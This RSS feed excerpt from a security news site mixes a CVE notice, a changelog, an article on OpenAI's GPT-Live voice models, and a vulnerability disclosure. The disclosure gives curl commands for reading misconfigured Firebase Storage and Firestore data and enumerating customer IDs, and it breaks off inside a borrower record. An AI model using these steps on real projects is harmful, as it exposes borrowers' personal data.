<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/ic_realtime:icip-p2012t">IC Realtime ICIP-P2012T 2.420</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code of the component <em>VLC Network Handler</em>. The manipulation results in improper access controls.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2023-31594">CVE-2023-31594</a>. The attack must originate from the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[javascript: v0.5.2]]></title>
<description><![CDATA[0.5.2 (2026-07-09)
Features

stamp scenario SDK version as trace attributes (#733) (#736) (6612c50)

Bug Fixes

voice: reconcile EL audioQueue at turn boundaries (#747) (#748) (1b135f7)

Code Refactoring

realtime: use the injectable Logger instead of console.* (#724) (#750) (54a89c5)
voice/tests...]]></description>
<link>https://tsecurity.de/de/3656774/it-security-tools/javascript-v052/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656774/it-security-tools/javascript-v052/</guid>
<pubDate>Thu, 09 Jul 2026 13:03:36 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/langwatch/scenario/compare/javascript/v0.5.1...javascript/v0.5.2">0.5.2</a> (2026-07-09)</h2>
<h3>Features</h3>
<ul>
<li>stamp scenario SDK version as trace attributes (<a href="https://github.com/langwatch/scenario/issues/733" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/733/hovercard">#733</a>) (<a href="https://github.com/langwatch/scenario/issues/736" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/736/hovercard">#736</a>) (<a href="https://github.com/langwatch/scenario/commit/6612c5086a462bf48a6b6a9b7e4809f09283ac6e">6612c50</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>voice:</strong> reconcile EL audioQueue at turn boundaries (<a href="https://github.com/langwatch/scenario/issues/747" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/747/hovercard">#747</a>) (<a href="https://github.com/langwatch/scenario/issues/748" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/748/hovercard">#748</a>) (<a href="https://github.com/langwatch/scenario/commit/1b135f792b5f126a05793c0141bd5f5726412cd5">1b135f7</a>)</li>
</ul>
<h3>Code Refactoring</h3>
<ul>
<li><strong>realtime:</strong> use the injectable Logger instead of console.* (<a href="https://github.com/langwatch/scenario/issues/724" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/724/hovercard">#724</a>) (<a href="https://github.com/langwatch/scenario/issues/750" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/750/hovercard">#750</a>) (<a href="https://github.com/langwatch/scenario/commit/54a89c53f8bea2c581e6d8cef361b4677811792d">54a89c5</a>)</li>
<li><strong>voice/tests:</strong> hoist AudioUserSimulator fixture to fixtures/ (<a href="https://github.com/langwatch/scenario/issues/524" data-hovercard-type="issue" data-hovercard-url="/langwatch/scenario/issues/524/hovercard">#524</a>) (<a href="https://github.com/langwatch/scenario/issues/738" data-hovercard-type="pull_request" data-hovercard-url="/langwatch/scenario/pull/738/hovercard">#738</a>) (<a href="https://github.com/langwatch/scenario/commit/e1dda4bc64549511e97c9288b5f6c8d5a44023b2">e1dda4b</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard]]></title>
<description><![CDATA[submitted by    /u/Fillmoslim   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3655775/malware-trojaner-viren/tool-crimson-cloak-iosish-security-wrapper-with-realtime-dashboard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655775/malware-trojaner-viren/tool-crimson-cloak-iosish-security-wrapper-with-realtime-dashboard/</guid>
<pubDate>Thu, 09 Jul 2026 04:03:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1ulxs0k/tool_crimson_cloak_iosish_security_wrapper_with/"> <img src="https://external-preview.redd.it/V3esYGBpX9ghUpS59ToWsDZUf5Q3mUGcXMfGdZaVSj4.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=424aa5175ec47cce3789e679f95498bbbc26e30a" alt="[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard" title="[Tool] Crimson Cloak, iOS/iSH Security Wrapper with RealTime Dashboard"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Fillmoslim"> /u/Fillmoslim </a> <br> <span><a href="https://github.com/synchancybersecurity/Crimson-Cloak-ISH-wrapper-iOS-">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ulxs0k/tool_crimson_cloak_iosish_security_wrapper_with/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI launches GPT-Live, a full-duplex voice upgrade that lets ChatGPT talk more like a person]]></title>
<description><![CDATA[OpenAI on Wednesday launched GPT-Live, a pair of new voice models that fundamentally redesign how people talk to ChatGPT — replacing the company's existing Advanced Voice Mode with an architecture that can listen and speak simultaneously, much like an actual human conversation.The two models, GPT...]]></description>
<link>https://tsecurity.de/de/3655359/it-nachrichten/openai-launches-gpt-live-a-full-duplex-voice-upgrade-that-lets-chatgpt-talk-more-like-a-person/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655359/it-nachrichten/openai-launches-gpt-live-a-full-duplex-voice-upgrade-that-lets-chatgpt-talk-more-like-a-person/</guid>
<pubDate>Wed, 08 Jul 2026 22:03:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://openai.com/">OpenAI</a> on Wednesday launched <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a>, a pair of new voice models that fundamentally redesign how people talk to ChatGPT — replacing the company's existing <a href="https://www.reddit.com/r/ChatGPT/comments/1fsna89/advanced_voice_mode_is_amazing/">Advanced Voice Mode</a> with an architecture that can listen and speak simultaneously, much like an actual human conversation.</p><p>The two models, <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live-1</a> and <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live-1 mini</a>, are rolling out globally starting today across iOS, Android, and ChatGPT.com. GPT-Live-1 becomes the default voice model for paid ChatGPT users on the Go, Plus, and Pro tiers, while GPT-Live-1 mini serves free-tier users. OpenAI also plans to bring the models to the API, and developers can sign up to be notified.</p><p>The release marks the third generation of ChatGPT's voice technology in roughly two years — and OpenAI's clearest bid yet to turn its chatbot into something that feels less like querying a search engine and more like talking to a colleague.</p><div></div><h2><b>Why full-duplex voice changes everything about talking to AI</b></h2><p>The defining technical advance in <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> is what OpenAI calls a "<a href="https://openai.com/index/introducing-gpt-live/">full-duplex architecture</a>." In telecommunications, full-duplex means both parties on a phone call can talk and listen at the same time. Applied to AI, it means the model continuously processes your incoming audio even while it generates its own spoken response — no more waiting for a clean silence gap to figure out when you've finished a thought.</p><p>"Instead of processing a sequence of separate messages, GPT-Live continuously processes input while generating output," OpenAI wrote in its research blog. "The model can therefore make interaction decisions many times per second: whether to speak, continue listening, pause, interrupt, or invoke a tool."</p><p>In practice, that translates to a voice assistant that can insert conversational acknowledgments — "mhmm," "yeah," "got it" — while you're still talking, pick up on a natural pause without jumping in prematurely, and handle rapid interruptions without derailing the entire exchange. </p><p>OpenAI's previous <a href="https://techcrunch.com/2024/09/24/openai-rolls-out-advanced-voice-mode-with-more-voices-and-a-new-look/">Advanced Voice Mode</a>, launched to paid users in September 2024, processed and generated audio within a single model but still operated on rigid turn-by-turn exchanges. As OpenAI acknowledged in the announcement, "because turn detection is based on silence, even a brief pause or background noise could be mistaken for the end of turn — causing the model to interrupt at unnatural times."</p><p>That brittleness created a product that, while impressive in demos, could be deeply frustrating in extended real-world use. Background chatter in a coffee shop could trigger a response. A thinking pause might get swallowed. The experience felt, as one researcher put it on X shortly after the announcement, like "<a href="https://x.com/SarahDiaChen/status/2074908276790087748">walkie-talkie turn taking</a>." GPT-Live is designed to end that era.</p><div></div><h2><b>How OpenAI split voice and intelligence into two separate layers</b></h2><p><a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> introduces a second structural change that may prove just as consequential for enterprise adoption: it decouples the voice interaction layer from the reasoning layer.</p><p>When a user asks a straightforward question, <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> handles it directly. But when the query demands web search, deeper reasoning, or more complex agentic work, GPT-Live delegates the task to a frontier model running in the background — at launch, GPT-5.5, the large language model OpenAI released in April — and continues talking with the user while the computation happens asynchronously.</p><p>"While it works, GPT-Live can keep talking with you and maintain the flow of conversation," OpenAI explains. "As we release new frontier models, we'll continuously update the model used by GPT-Live."</p><p>This delegation model is a meaningful architectural bet. Rather than building a single monolithic voice model that tries to be both conversationally fluid and deeply intelligent, OpenAI has split the problem in two: a voice-native model optimized for real-time interaction, and a separate reasoning engine that can be swapped out as the state of the art improves. </p><p>It is, in effect, a modular design — one that allows OpenAI to upgrade the intelligence of its voice assistant without retraining the voice model itself. The implications for enterprise and developer workflows are significant. A voice agent built on this architecture could maintain a natural conversation with a customer while simultaneously querying databases, searching the web, or performing multi-step reasoning — tasks that would have introduced several seconds of dead air under the old pipeline.</p><div></div><h2><b>The three generations of ChatGPT voice, from clunky pipeline to continuous stream</b></h2><p>To understand how far voice AI has come, it helps to trace the three generations that led to <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a>.</p><p>The original <a href="https://techcrunch.com/2023/09/25/openai-chatgpt-voice/">ChatGPT Voice</a>, launched in 2023, used a cascaded pipeline — a speech-to-text model (<a href="https://openai.com/index/whisper/">Whisper</a>) transcribed what you said, a large language model (<a href="https://openai.com/index/gpt-4-research/">GPT-4</a>) generated a text response, and a text-to-speech model converted that response back into audio. Each handoff introduced latency and lost information. </p><p>As OpenAI noted, "the complexity came at a cost: information could be lost across models, and responses were slow and stilted." That cascaded approach was the industry standard, and its limitations were well-documented. As the blog <a href="https://www.openhelm.ai/blog/openai-realtime-api-voice-agents-launch">OpenHelm</a> noted in an October 2024 analysis of OpenAI's Realtime API, the old pipeline stacked up to roughly 1,700 milliseconds of latency — nearly two full seconds of dead air before the first word of a response. Managing the state between the three separate APIs consumed an enormous amount of engineering effort.</p><p>OpenAI's Advanced Voice Mode, which began its limited rollout to paid ChatGPT Plus users in July 2024 before expanding more broadly in September 2024, collapsed that three-model pipeline into a single model that processed audio natively. As <a href="https://techcrunch.com/2024/09/24/openai-rolls-out-advanced-voice-mode-with-more-voices-and-a-new-look/">TechCrunch reported</a> at the time, the rollout came with five new voices — Arbor, Maple, Sol, Spruce, and Vale — alongside improved accent handling and smoother conversations. </p><p>The feature also launched on the web in November 2024, extending it beyond mobile. But Advanced Voice Mode still operated through discrete, alternating turns — and it launched into the shadow of a PR debacle that OpenAI is still working to leave behind.</p><h2><b>The Scarlett Johansson controversy still shadows OpenAI's voice ambitions</b></h2><p>Advanced Voice Mode arrived in the wake of one of OpenAI's most damaging self-inflicted crises. During the GPT-4o launch in May 2024, the company showcased a voice called "Sky" that many listeners immediately noted sounded <a href="https://www.npr.org/2024/05/31/g-s1-2263/voice-lab-analysis-striking-similarity-scarlett-johansson-chatgpt-sky-openai">strikingly similar to Scarlett Johansson</a>, who famously voiced an AI companion in the 2013 film <a href="https://en.wikipedia.org/wiki/Her_(2013_film)"><i>Her</i></a>.</p><p>Johansson said she had <a href="https://www.cnbc.com/2024/05/20/scarlett-johansson-says-openai-ripped-off-her-voice-.html">declined OpenAI CEO Sam Altman's offer</a> to voice the system, then was "shocked, angered and in disbelief" when the product launched with a voice her own friends couldn't distinguish from hers, as NBC News reported. Altman had tweeted just the word "her" the day the product launched.</p><p>OpenAI pulled the voice and apologized, but the incident <a href="https://www.nbcnews.com/tech/sag-aftra-applauds-scarlett-johansson-rebuking-openai-voice-sounded-rcna153256">drew public scrutiny from SAG-AFTRA</a> and <a href="https://www.npr.org/2024/05/20/1252495087/openai-pulls-ai-voice-that-was-compared-to-scarlett-johansson-in-the-movie-her">members of Congress</a>, and crystallized broader concerns about AI companies moving fast with creative IP.</p><p>The Hollywood labor union said the issue underscored "why we're strongly championing federal legislation that would protect their voices and likenesses ... from unauthorized digital replication," as <a href="https://www.nbcnews.com/tech/sag-aftra-applauds-scarlett-johansson-rebuking-openai-voice-sounded-rcna153256">NBC News reported</a>. Forbes contributor <a href="https://www.forbes.com/sites/paultassi/2024/05/21/chatgpt-4o-scarlett-johansson-and-missing-the-point-of-her/">Paul Tassi wrote</a> at the time that Altman, "by holding up <i>Her</i> on a pedestal of something to strive for, has missed the point of that film" — in which the protagonist's relationship with his AI companion ultimately does him more harm than good.</p><p><a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> appears designed, in part, to move past those controversies. OpenAI says it has "remastered the nine distinct voices in ChatGPT for GPT-Live" and notes the system "is designed for conversation, not voice impersonation," with "safeguards to prevent it from imitating a real person's voice."</p><h2><b>What 150 million weekly voice users will actually notice today</b></h2><p>OpenAI disclosed that more than <a href="https://openai.com/index/introducing-gpt-live/">150 million people</a> talk to ChatGPT using voice and dictation features each week — a notable slice of the platform's 900 million total weekly active users. The voice experience has grown into a substantial product in its own right, used for language practice, bedtime stories, commute-time chat, and hands-free everyday help.</p><p>The new product features reflect that usage. <a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> introduces rich visual cards that surface during voice conversations — weather forecasts, stock data, sports scores, and maps — giving users something to glance at without breaking the flow of speech.</p><p>Users can now choose between three reasoning levels for answers: Instant for quick responses, Medium for moderate thinking, and High for more complex work. And if you take a moment to think, "ChatGPT Voice now waits instead of jumping in and interrupting," OpenAI wrote. "If you ask it to stay quiet and listen, it will. And when there's background noise, like passing traffic or nearby conversations, ChatGPT is better at focusing on your voice instead of getting distracted."</p><p>Early reactions from users with preview access were cautiously positive. "I had early access to sol. it is a phenomenal model," <a href="https://x.com/jakeottiger/status/2074714639292625154">wrote one user on X</a>, adding it is “much better at frontend, long context knowledge work, and its vibes are much better.” <a href="https://x.com/SarahDiaChen/status/2074908276790087748">Another observer</a> cut to the heart of the matter: "The smarts are not new here, GPT-Live hands hard questions to GPT-5.5. What is new is the feel: full-duplex voice that listens while it talks."</p><h2><b>New voice-specific safety tests reveal where the risks still live</b></h2><p>The <a href="https://deploymentsafety.openai.com/gpt-live">GPT-Live system card</a>, published alongside the announcement, reveals a safety strategy built around the particular risks of real-time voice interaction — a domain where the speed and intimacy of conversation create hazards that text-based chat does not.</p><p>OpenAI expanded its safety evaluations to include audio-native tests, using both real user voice samples (from those who opted in) and synthetically generated prompts targeting edge cases across categories like self-harm, sexual content, illicit behavior, emotional reliance, mental health, and hate speech.</p><p>On the synthetic evaluations — which OpenAI described as deliberately adversarial — GPT-Live-1 showed substantial improvements over Advanced Voice Mode. In illicit behavior, for instance, the safety score rose from 0.63 to 0.97. On self-harm, it climbed from 0.72 to 0.98. Hate speech achieved a perfect 1.00, up from 0.87.</p><p>On the production-prompt evaluations — which used real user audio and reflected more ambiguous, borderline scenarios — the picture was more mixed. GPT-Live-1 matched or improved on Advanced Voice Mode in most categories but showed a slight regression on emotional reliance (from 0.88 to 0.82), though OpenAI noted the change was not statistically significant.</p><p>The company built real-time safeguards that can intervene while the model is speaking — steering toward safer responses, surfacing crisis resources, or ending the voice conversation entirely in higher-risk situations. It also designed additional protections for teen users and adapted self-harm support flows for voice, including crisis helpline integration.</p><p>Perhaps most notably, OpenAI said it is "rolling out longer-term measurement and post-launch monitoring focused on emotional reliance" — an acknowledgment that the very naturalness GPT-Live strives for creates its own category of risk.</p><h2><b>Google, ByteDance, and Nvidia are already in the full-duplex race</b></h2><p>While OpenAI was refining its safety guardrails, its rivals were shipping full-duplex systems of their own. Google's <a href="https://gemini.google/overview/gemini-live/">Gemini Live</a>, which supports full-duplex conversation alongside camera and screen sharing — capabilities GPT-Live notably lacks at launch — is already available in the Gemini app. Google released <a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-live/">Gemini 3.1 Flash Live</a> in March as its highest-quality real-time audio model, targeting low-latency voice interactions for developers.</p><p>ByteDance launched <a href="https://seeduplex.io/">Seeduplex</a> in April, claiming to be the first production-scale full-duplex speech AI deployed at scale, inside its Doubao app. Seeduplex reported roughly a 50 percent reduction in false-response and false-interruption rates compared to ByteDance's previous half-duplex system. And Nvidia's <a href="https://research.nvidia.com/labs/adlr/personaplex/">PersonaPlex</a>, released in January, brought customizable voice and role control to full-duplex models, breaking what had been a constraint where natural-sounding models were locked into a single fixed voice.</p><p>The competitive picture is clear: full-duplex voice interaction is quickly becoming table stakes for consumer AI products, not a differentiator. OpenAI's advantage lies in the scale of its existing user base, its integration with GPT-5.5's reasoning capabilities, and the breadth of the ChatGPT ecosystem.</p><p>But the window in which any one company has a monopoly on natural-sounding voice AI has already closed. OpenAI also acknowledged several gaps. GPT-Live does not support voice with video or screen sharing at launch. Language support is limited, with the company noting that "for certain languages, the model may have a non-native accent or gaps in fluency." And API access is not available on day one, meaning enterprise developers cannot yet build on GPT-Live directly — a constraint that will slow the model's penetration into commercial voice-agent workflows where competitors like Google, ElevenLabs, and Deepgram already have developer-facing products.</p><h2><b>The end of the chat box may be closer than anyone expected</b></h2><p><a href="https://openai.com/index/introducing-gpt-live/">GPT-Live</a> is essentially OpenAI's most significant bet yet on voice as the primary interface for AI — not just a convenience feature bolted onto a text chatbot, but a purpose-built interaction layer that sits between the user and the company's most powerful models.</p><p>"Over time, we believe this research will also unlock the ability to use voice for increasingly complex, longer-running, and more agentic work," OpenAI wrote. That ambition — using natural voice as the front end for autonomous AI agents that can perform multi-step tasks — is the logical endpoint of the full-duplex plus delegation architecture.</p><p>Imagine telling your phone to book a flight, negotiate with your insurance company, or debug a production server, all through a conversation that feels as natural as talking to an assistant who also happens to have the intelligence of a frontier AI model.</p><p>Two years ago, talking to ChatGPT meant dictating into a microphone and waiting nearly two seconds for a stilted reply. One year ago, it meant a smoother exchange that still felt like a polite, slightly awkward phone call with someone who insisted on waiting for you to finish every sentence. Today, it means something closer to a real conversation — imperfect, still constrained in some languages and missing video, but unmistakably closer. OpenAI once got into trouble for wanting to recreate the movie <i>Her</i>. With GPT-Live, the company may finally be reckoning with the harder question the film actually posed: not whether AI can sound human enough to talk to, but what happens to us when it does.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[No Rules, No Locks: Firebase Misconfiguration and the Borrowers It Left Behind]]></title>
<description><![CDATA[Firebase security rules are opt-in. The default, for every new database & storage bucket, is wide open. This is the writeup of a vulnerability started by a team that built an entire lending platform on Firebase, left 2 out of 3 services at their defaults, and what that meant for the people who tr...]]></description>
<link>https://tsecurity.de/de/3651406/hacking/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651406/hacking/no-rules-no-locks-firebase-misconfiguration-and-the-borrowers-it-left-behind/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:48 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WrD1mgShGttnp0KMG6MrLQ.png"></figure><blockquote>Firebase security rules are opt-in. The default, for every new database &amp; storage bucket, is wide open. This is the writeup of a vulnerability started by a team that built an entire lending platform on Firebase, left 2 out of 3 services at their defaults, and what that meant for the people who trusted them with their data.</blockquote><p>Somewhere in this story is a woman who applied for a small loan. She submitted her national ID number, her date of birth, her home address, her GPS coordinates, a photo of her face, a photo of her ID card. and a photo of her house. She listed her husband’s name, her mother’s maiden name, her guarantor’s national ID number. She received a credit score. She signed digitally. She trusted that the platform handling all of this had taken the precautions that platforms are supposed to take.</p><p>She had no reason not to. That’s not naivety. That’s a reasonable assumption about how applications work.</p><p>This is about what those precautions actually looked like.</p><h3>What Firebase Actually Is</h3><p>Before getting into the vulnerability, it’s worth understanding the platform, because the misconfiguration here is not a bug in Firebase. It’s a misunderstanding of how Firebase is designed to work, and that distinction matters.</p><p>Firebase is a Backend-as-a-Service (BaaS) platform built and operated by Google. It lets development teams build production applications without managing traditional server infrastructure. Instead of provisioning database servers, configuring file storage, or building authentication systems from scratch, a team connects their app to Firebase and uses Google’s managed services for all of it.</p><p>The relevant services for this vulnerability :</p><p><strong>Firebase Storage</strong> is file hosting backed by Google Cloud Storage. Teams use it to store user-uploaded files: profile photos, ID card scans, document PDFs, form attachments. Files are organized in a bucket, accessible via a REST API.</p><p><strong>Firebase Firestore</strong> is a document database. It stores structured data in collections of documents, each containing key-value fields. It’s the equivalent of MongoDB in the Firebase ecosystem. This is where application data lives: user records, transaction histories, application submissions.</p><p><strong>Firebase Realtime Database</strong> is Firebase’s older JSON tree database. Some projects use it alongside Firestore for real-time sync features, others use it as the primary store. Structured differently from Firestore but the same access model: REST endpoints, security rules controlling access.</p><p>Each of these three services is separate. Each has its own REST API endpoints, its own data model, its own security rules configuration. But they all share one thing: a single `projectId`, the umbrella identifier that ties the entire Firebase project together.</p><p>That’s the architecture detail that makes this class of vulnerability so impactful. One project, three services, three independent security configurations and if any of them is misconfigured, the others are often misconfigured too. Teams that build everything under one Firebase project tend to think about security at the project level, not the service level. When they forget to set rules, they usually forget across the board.</p><h3><strong>The Entry Point: init.json</strong></h3><p>There is a path that almost every Firebase-powered web application exposes by default.</p><p>It sits at `/__/firebase/init.json`. Firebase puts it there intentionally, so the frontend JavaScript SDK can initialize without hardcoding credentials into the app bundle. It’s not hidden, not a mistake, not a misconfiguration by itself. Every developer who deploys a Firebase web app gets this file automatically, whether they think about it or not.</p><p>I’ve seen it many times. Most of the time you note it and move on.</p><p>This time I stayed a little longer.</p><pre>{<br>  "apiKey": "AIzaSy[REDACTED]",<br>  "projectId": "[PROJECT-ID]",<br>  "storageBucket": "[PROJECT-ID].appspot.com",<br>  "databaseURL": "https://[PROJECT-ID].asia-southeast1.firebasedatabase.app",<br>  "authDomain": "[PROJECT-ID].firebaseapp.com"<br>}</pre><p>Six fields. Short enough to read in ten seconds. Most people who encounter this file fixate on apiKey first — it sounds like a credential. <strong>It isn’t. Firebase API keys are not authentication tokens. </strong>They’re project routing identifiers, used to direct SDK calls to the correct Firebase project. <strong>They’re designed to be public.</strong> You cannot authenticate as a user, access a database, or read a storage bucket using an API key alone. The API key is not the vulnerability.</p><p>The field that matters is <em>projectId </em>.</p><p>Once you have the projectId, you can construct the REST endpoint for every Firebase service on the project from scratch. The URL patterns are documented, consistent, and require no guessing:</p><pre>Firebase Storage:<br>  https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o<br><br>Firebase Firestore:<br>  https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/[collection]<br><br>Firebase Realtime Database:<br>  https://[PROJECT-ID].asia-southeast1.firebasedatabase.app/.json</pre><p>All three reachable via plain HTTP requests. No browser, no SDK, no session cookie. Just the projectId and a curl command.</p><p>Whether those requests succeed or return 403 depends entirely on the security rules each service has configured. If the rules say “allow all,” anyone can access anything. If the rules say “require auth,” unauthenticated requests get rejected. The rules are the only gate.</p><p>With those three endpoints in hand, the next step was simple: test each one.</p><h3>Mapping the Full Attack Chain</h3><p>Before diving into each service, here’s what the chain looked like from the outside in. This is the map that a single init.json response made possible:</p><pre>[REDACTED].com/__/firebase/init.json          ← Entry point: one public URL<br>        │<br>        └── Exposes: projectId = "[PROJECT-ID]"<br>                        │<br>        ┌───────────────┼──────────────────────────────────┐<br>        │               │                                  │<br>        ▼               ▼                                  ▼<br>Firebase Storage   Firebase Firestore          Firebase Realtime DB<br>(appspot.com)      (firestore.googleapis.com)  (firebasedatabase.app)<br>        │               │                                  │<br>   READ  ⚠️👨🏻‍💻      READ  ⚠️👨🏻‍💻                      READ  🔒︎(403 ✅)<br>  WRITE  ⚠️👨🏻‍💻     WRITE  ⚠️👨🏻‍💻                     WRITE  🔒︎(403 ✅)<br> DELETE  ⚠️👨🏻‍💻    DELETE  ⚠️👨🏻‍💻<br>        │               │<br>  100+ files        4 open collections:<br>  form schemas      ├── customers  → real borrower NIK, phone, GPS<br>  legal HTML        ├── loans      → loan amounts, disbursement, docs<br>  bank codes        ├── surveys    → complete filled applications<br>                    └── groups     → group metadata + moderator PII</pre><p>The Realtime Database was the one service the team had locked down correctly. Everything else was open.</p><h4><strong>The First Test: Firebase Storage</strong></h4><p>Firebase Storage’s listing endpoint accepts no authentication by default and returns a paginated JSON listing of every file in the bucket:</p><pre>curl -s "https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o?maxResults=1000"</pre><p>HTTP 200. No credentials. Over 100 files in the response:</p><pre>{<br>  "items": [<br>    {"name": "FCMImages/Capture.PNG"},<br>    {"name": "FCMImages/Security-Awareness-1000x1000.jpg"},<br>    {"name": "FIAMImages/Fraud-Awareness-Square (1) (1).jpg"},<br>    {"name": "csr/html/form/uk/loan_distribution-1.0.0.html"},<br>    {"name": "csr/html/form/uk/perjanjian_penanggungan-1.0.0.html"},<br>    {"name": "csr/html/terms/cashless/cashless_terms_and_condition-1.1.2.html"},<br>    {"name": "csr/json/bank/banks-1.0.2.json"},<br>    {"name": "csr/json/form/aplus/form-aplus-1.1.0.json"},<br>    {"name": "csr/json/form/monus/form-monus-1.0.0.json"},<br>    {"name": "uk/form-5.5.10.json"},<br>    {"name": "uk/form-5.5.9.json"},<br>    {"name": "uk/form-5.5.0.json"},<br>    {"name": "uk/form-5.3.2.json"},<br>    ...<br>  ]<br>}</pre><p>Downloading any file follows a consistent pattern:</p><pre>https://firebasestorage.googleapis.com/v0/b/[BUCKET]/o/[URL-encoded-filename]?alt=media</pre><p>The `?alt=media` parameter instructs Firebase to return the file contents directly instead of the metadata envelope. Forward slashes in the filename become `%2F`</p><pre>curl -s "https://firebasestorage.googleapis.com/v0/b/[PROJECT-ID].appspot.com/o/uk%2Fform-5.5.10.json?alt=media"</pre><p>What was in the bucket? Mostly application scaffolding: versioned form schema JSON files, HTML legal documents, bank code reference lists, marketing images. The `uk/form-5.5.10.json` schema defines the full structure of the loan application form; field names, field types, validation rules, conditional logic, but contains no actual borrower data. It’s a 114-field blueprint describing what a completed application looks like, not the completed applications themselves.</p><p>The bucket was misconfigured: unauthenticated listing, download, upload, and delete all returned HTTP 200. But the exposed files were templates, not records. Business logic exposed, not PII.</p><p>What the bucket did was tell me exactly what kind of platform this was and what the data schema looked like. Loan distribution forms. KTP (national ID card) photo upload fields. Guarantor fields. Cashless terms and conditions. Versioned form schemas with Indonesian field naming conventions.</p><p>This was a microfinance lending platform, almost certainly serving Indonesian borrowers. And if Storage had the form blueprints, Firestore almost certainly had the filled-out submissions.</p><h4><strong>Understanding Firestore’s Structure</strong></h4><p>Firestore is Firebase’s document database. The data model is straightforward: a database contains collections, each collection contains documents, each document contains fields. The REST API follows this hierarchy directly:</p><pre>https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/[collection]/[documentId]</pre><p>Hitting the collection endpoint without a document ID returns a paginated list of all documents in that collection. Hitting a specific document path returns that document’s full field contents.</p><p>The catch: you need to know the collection name. Firestore doesn’t expose a collection listing endpoint without authentication. Without a valid name, the API returns an error. With a valid name and open security rules, it returns everything.</p><p>Collection names in a microfinance lending platform are not a mystery. Developers name things after what they contain. Any team building this kind of system reaches for the same vocabulary: `customers`, `loans`, `borrowers`, `users`, `applications`, `surveys`, `payments`, `transactions`, `groups`, `branches`, `agents`.</p><p>The testing methodology is simple and the response codes are unambiguous:</p><ul><li><strong>HTTP 200:</strong> collection exists and is readable without authentication. Vulnerability confirmed.</li><li><strong>HTTP 403:</strong> collection exists but requires authentication. Correctly secured.</li><li><strong>HTTP 404:</strong> collection does not exist.</li></ul><pre>curl -s -o /dev/null -w "%{http_code}" \<br>  "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/customers?pageSize=1"</pre><p>I tested over 80 collection names. Here is what the response codes mapped to:</p><pre>| Collection | HTTP | Has Documents | Contents |<br>| - -| - -| - -| - -|<br>| `customers` | 200 | Yes | Full borrower PII |<br>| `loans` | 200 | Yes | Loan records + document URLs |<br>| `surveys` | 200 | Yes | Complete filled applications |<br>| `groups` | 200 | Yes | Group metadata + moderator PII |<br>| `users` | 200 | Empty | Accessible, no data |<br>| `borrowers` | 200 | Empty | Accessible, no data |<br>| `transactions` | 200 | Empty | Accessible, no data |<br>| 70+ others | 200 | Empty | Accessible, no data |<br>| Realtime DB (all paths) | 403 | - | Correctly secured |</pre><p>Four collections containing real production data. Seventy-plus that were accessible but empty. And the Realtime Database, across every path tried, returned 403. One out of three services had functioning security rules. Two did not.</p><p>The accessible-but-empty collections are worth noting. They confirm that the security rules were missing entirely, not just misconfigured for specific collections. Any collection the team had ever created or would ever create in this Firestore instance was open to the public, including future collections they hadn’t built yet.</p><h4><strong>The Customers Collection: Borrower PII at Scale</strong></h4><p>Customer IDs in the `customers` collection followed recognizable numeric ranges: `2020xxxxxx` and `5001xxxxxx`. The prefix pattern is consistent with registration year and batch grouping. Sequential enumeration from a known starting ID worked directly.</p><pre>curl -s "https://firestore.googleapis.com/v1/projects/[PROJECT-ID]/databases/(default)/documents/customers/5001000000"</pre><p>HTTP 200:</p><pre>{<br>  "name": "projects/[PROJECT-ID]/databases/(default)/documents/customers/5001000000",<br>  "fields": {<br>    "name":         { "stringValue": "SITI [REDACTED]" },<br>    "legalId":      { "stringValue": 